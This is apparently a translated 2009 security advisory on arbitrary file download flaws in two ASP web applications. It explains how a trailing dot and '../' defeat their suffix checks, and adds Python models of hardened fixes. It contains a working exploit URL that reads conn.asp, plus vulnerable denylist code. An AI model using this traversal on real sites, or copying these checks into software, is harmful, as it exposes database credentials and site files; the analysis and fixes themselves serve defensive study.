ASP file download vulnerability - Vulnerability Warning - Black Bar Safety Net (myhack58)

2009-02-27T00:00:00
ID MYHACK58:62200922332
Type myhack58
Reporter Anonymous (佚名)
Modified 2009-02-27T00:00:00

Description

1: Boiling Prospect news system (down.asp)

Const adTypeBinary = 1
FileName = Request.QueryString("FileName")
If FileName = "" Then
    Response.Write "invalid file name!"
    Response.End
End If
' cut the suffix after the last dot and refuse script/database extensions
FileExt = Mid(FileName, InStrRev(FileName, ".") + 1)
Select Case UCase(FileExt)
    Case "ASP", "ASA", "ASPX", "ASAX", "MDB"
        Response.Write "illegal operation!"
        Response.End
End Select
Response.Clear
If LCase(Right(FileName, 3)) = "gif" Or LCase(Right(FileName, 3)) = "jpg" Or LCase(Right(FileName, 3)) = "png" Then
    Response.ContentType = "image/*"   ' image files are shown inline, no download dialog
Else
    Response.ContentType = "application/ms-download"
End If
Response.AddHeader "content-disposition", "attachment; filename=" & GetFileName(Request.QueryString("FileName"))
Set Stream = Server.CreateObject("ADODB.Stream")
Stream.Type = adTypeBinary
Stream.Open
SavePath = FileUploadPath   ' directory where uploaded files are stored (original variable name lost in translation)
TrueFileName = SavePath & FileName   ' user input appended unfiltered, so ../ walks out of the directory
Stream.LoadFromFile Server.MapPath(TrueFileName)
While Not Stream.EOS
    Response.BinaryWrite Stream.Read(1024 * 64)
Wend

Exploit: http://www.target.com/down.asp?FileName=../conn.asp. (no login needed; if the page checks the Referer, forge it with a mini-browser tool.) The key is this section of code. It uses the InStrRev function to cut out the file suffix, which is fine on its own, but once we append one more dot to the name the suffix it cuts is empty, so the check that follows is bypassed and the file can be downloaded. Two things make the trick work: the Windows file system strips trailing dots from a file name, so conn.asp. is opened as conn.asp; and FileName is appended to the upload directory without any filtering, so ../ walks out of it.

FileExt = Mid(FileName, InStrRev(FileName, ".") + 1)
Select Case UCase(FileExt)
    Case "ASP", "ASA", "ASPX", "ASAX", "MDB"
        Response.Write "illegal operation!"
        Response.End
End Select

The suffix is whatever follows the last dot. If we put one more dot at the very end, what follows it is empty, so none of the Case branches match and the request is not treated as illegal.

The InStrRev function

First, the last argument, compare, selects the kind of comparison: 0 performs a binary comparison, 1 a textual (case-insensitive) comparison, and 2 a comparison based on information in the database (Microsoft Access only).

InStrRev searches from right to left. The start argument is explained with the example below.

SearchString = "XXpXXpXXPXXP"
SearchChar = "P"
'  X  X  p  X  X  p  X  X  P  X  X  P
'  1  2  3  4  5  6  7  8  9  10 11 12

' Binary comparison starting at character 10. Returns 9.
MyPos = InStrRev(SearchString, SearchChar, 10, 0)
' Explanation: start at the 10th character (an X) and search leftwards; the first P found is at position 9.

' Textual comparison starting at the last character. Returns 12.
MyPos = InStrRev(SearchString, SearchChar, -1, 1)
' Explanation: -1 means start at the last position; searching from right to left, the last P is at position 12.

' Default is binary comparison (last argument omitted). Returns 0.
MyPos = InStrRev(SearchString, SearchChar, 8)
' Explanation: start at position 8 and search leftwards; there is no uppercase P in that range, so 0 is returned.

1: It returns a number (the position).

2: It searches from right to left.

3: InStrRev(FileName, ".") + 1 gives the position of the first letter of the suffix. Look at this:

<%
Dim strTXT, pos
strTXT = "www.webjx.com"
pos = InStrRev(strTXT, ".")
Response.Write pos
%>

The search runs in reverse, so the dot it finds is the one just before "com". Counting from the start of the string up to and including that dot gives ten characters, so the result is 10. Mid needs the position of the first letter of the suffix, which is one further on, hence the +1: Mid(strTXT, pos + 1) yields "com". (ASP Mid function: http://www.fzs8.net/asp/2007-06-10/4209.html)
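To make the InStrRev walkthrough and the suffix-check bypass concrete, here is an added example in Python; it is not code from the advisory or from the Boiling Prospect system. It re-implements the two VBScript functions the check depends on (InStrRev and Mid), reproduces the advisory's check on top of them, models the Win32 trailing-dot stripping that makes conn.asp. open as conn.asp, and shows a hardened replacement. The function names, the windows_opens_as simplification and the ALLOWED_EXT allowlist are my own assumptions.

```python
"""Added example: VBScript InStrRev/Mid re-implemented in Python, the
advisory's suffix check built on them, and a hardened replacement.
Not code from the advisory; helper names and the allowlist are assumed."""

VB_BINARY_COMPARE = 0
VB_TEXT_COMPARE = 1


def instrrev(string1, string2, start=-1, compare=VB_BINARY_COMPARE):
    """VBScript InStrRev: 1-based position of the last occurrence of
    string2 that fits within the first `start` characters of string1;
    start=-1 means search from the last character. 0 when not found."""
    if compare == VB_TEXT_COMPARE:            # textual comparison ignores case
        string1, string2 = string1.lower(), string2.lower()
    if start == -1:
        start = len(string1)
    if start > len(string1):
        return 0
    return string1[:start].rfind(string2) + 1    # rfind's -1 becomes VBScript's 0


def mid(string, start, length=None):
    """VBScript Mid with a 1-based start position."""
    begin = start - 1
    return string[begin:] if length is None else string[begin:begin + length]


BLOCKED_EXT = {"ASP", "ASA", "ASPX", "ASAX", "MDB"}


def feiteng_suffix(filename):
    """FileExt = Mid(FileName, InStrRev(FileName, ".") + 1), same logic as the page."""
    return mid(filename, instrrev(filename, ".") + 1)


def feiteng_blocks(filename):
    """True when the advisory's Select Case would answer 'illegal operation!'."""
    return feiteng_suffix(filename).upper() in BLOCKED_EXT


def windows_opens_as(filename):
    """Win32 drops trailing dots and spaces from the last path component,
    so 'conn.asp.' is opened as 'conn.asp'. Simplified model of that rule
    (assumption: no other Win32 normalisation matters for these inputs)."""
    return filename.rstrip(". ")


ALLOWED_EXT = {"gif", "jpg", "png", "zip", "rar", "txt"}   # assumed allowlist


def hardened_check(filename):
    """Return the file name to serve, or None to refuse. Refuses names that
    Win32 would silently rewrite, names carrying separators or traversal,
    and anything whose real suffix is not on the allowlist."""
    if windows_opens_as(filename) != filename:   # trailing dot/space trick
        return None
    if not filename or any(c in filename for c in "/\\:") or filename in (".", ".."):
        return None
    dot = instrrev(filename, ".")
    ext = mid(filename, dot + 1) if dot else ""
    if not ext or ext.lower() not in ALLOWED_EXT:   # allowlist, not denylist
        return None
    return filename


if __name__ == "__main__":
    s = "XXpXXpXXPXXP"   # the advisory's InStrRev walkthrough
    print(instrrev(s, "P", 10, 0), instrrev(s, "P", -1, 1), instrrev(s, "P", 8))  # 9 12 0
    print(instrrev("www.webjx.com", "."))                                          # 10
    for name in ("conn.asp", "conn.asp.", "../conn.asp."):
        print(repr(name), "suffix=%r" % feiteng_suffix(name),
              "blocked" if feiteng_blocks(name) else "ALLOWED",
              "-> opens", windows_opens_as(name),
              "hardened:", hardened_check(name))
```

The hardened version turns the denylist into an allowlist, checks the extension only after deciding the name contains no separators or traversal, and refuses any name that Win32 would normalise instead of trying to guess what it will open; the name the check approves is exactly the name that reaches the file system.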

2: Oblog download vulnerability. The path is taken straight from the request:

Path = Trim(Request("path"))

and then downloaded directly:

If true_domain = 1 Then
    downloadFile Server.MapPath(Replace(Path, blogurl, "")), 1
Else
    downloadFile Server.MapPath(Path), 1
End If

That is the vulnerability: the user-supplied path goes to Server.MapPath without any check.

Tr4c3 (a big name in the scene) looked at the later version, which still starts from Path = Trim(Request("path"))

and then adds a check:

If InStr(path, Oblog.CacheConfig(56)) > 0 Then
    ' Tr4c3 note: notice that this only checks whether the user-submitted path contains the configured value (CacheConfig(56)); if it does, the downloadFile function is called to send the file
    downloadFile Server.MapPath(Path), 1
End If
Select Case LCase(Right(strFile, 4))
    Case ".asp", ".mdb", ".config", ".js"
    ' Tr4c3 note: then look here, remember it? By the way, the Boiling Prospect news system arbitrary download vulnerability I posted a few days ago [http://www.tr4c3.com/post/306.html] uses almost the same checking method; the way to exploit it is also similar, and the magic "." comes in handy again.

For reference, the two ways of obtaining the suffix seen above:

LCase(Right(strFile, 4))

FileExt = Mid(FileName, InStrRev(FileName, ".") + 1)
Select Case UCase(FileExt)
    Case "ASP", "ASA", "ASPX", "ASAX", "MDB"
        Response.Write "illegal operation!"
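The Oblog checks fail for a different reason than the Boiling Prospect one: a substring match on the path does not stop ../, and Right(strFile, 4) is defeated by the same trailing dot (and, as the quoted code shows, can never equal the seven-character ".config" at all). The following added example, written by me and not taken from Oblog, models both checks in Python and pairs them with a resolver that canonicalises the path and confines it to the upload root. It assumes Oblog.CacheConfig(56) is the attachment directory (modelled as UPLOAD_DIR), that WEB_ROOT stands for the directory Server.MapPath resolves against, and an illustrative ALLOWED_EXT allowlist.

```python
"""Added example, not Oblog's code: the two Oblog checks quoted above
modelled in Python, plus a hardened path resolver. UPLOAD_DIR, WEB_ROOT
and ALLOWED_EXT are assumptions standing in for Oblog's configuration."""
import posixpath

UPLOAD_DIR = "/attachments/"        # stands in for Oblog.CacheConfig(56) (assumed)
WEB_ROOT = "/var/www/oblog"         # stands in for the Server.MapPath root (assumed)
BLOCKED_4 = {".asp", ".mdb", ".config", ".js"}
ALLOWED_EXT = {".gif", ".jpg", ".png", ".zip", ".rar", ".txt"}


def instr(string1, string2):
    """VBScript InStr: 1-based position of string2 in string1, 0 if absent."""
    return string1.find(string2) + 1


def right(string, length):
    """VBScript Right: the last `length` characters of the string."""
    return string[-length:] if length else ""


def oblog_path_check_passes(path):
    """If InStr(path, Oblog.CacheConfig(56)) > 0 Then downloadFile ..."""
    return instr(path, UPLOAD_DIR) > 0


def oblog_ext_blocks(strfile):
    """Select Case LCase(Right(strFile, 4)) Case ".asp", ".mdb", ".config", ".js" """
    return right(strfile, 4).lower() in BLOCKED_4


def hardened_resolve(path):
    """Canonicalise the request path the way a safe Server.MapPath wrapper
    should, refuse anything Win32 would quietly rewrite, then require the
    result to stay under the upload root and end in an allowed extension."""
    rel = path.replace("\\", "/")
    if rel != rel.rstrip(". "):                  # trailing dot/space trick
        return None
    upload_root = posixpath.normpath(WEB_ROOT + UPLOAD_DIR)
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, rel.lstrip("/")))
    # containment is decided on the canonical path, not by substring match
    if candidate == upload_root or posixpath.commonpath([upload_root, candidate]) != upload_root:
        return None
    if posixpath.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None
    return candidate


if __name__ == "__main__":
    for p in ("/attachments/pic.jpg", "/attachments/../conn.asp", "/attachments/../conn.asp."):
        print(repr(p),
              "InStr check:", "passes" if oblog_path_check_passes(p) else "fails",
              "Right(4) blocks:", oblog_ext_blocks(p),
              "hardened:", hardened_resolve(p))
    print("web.config blocked by Right(4)?", oblog_ext_blocks("web.config"))   # False
```

With the substring check, any path that merely mentions the attachment directory is accepted, so /attachments/../conn.asp passes and the trailing dot then slips past the four-character suffix test. The hardened resolver decides containment on the normalised path with posixpath.commonpath, so the ../ is collapsed before the comparison and the request is refused regardless of which suffix trick accompanies it.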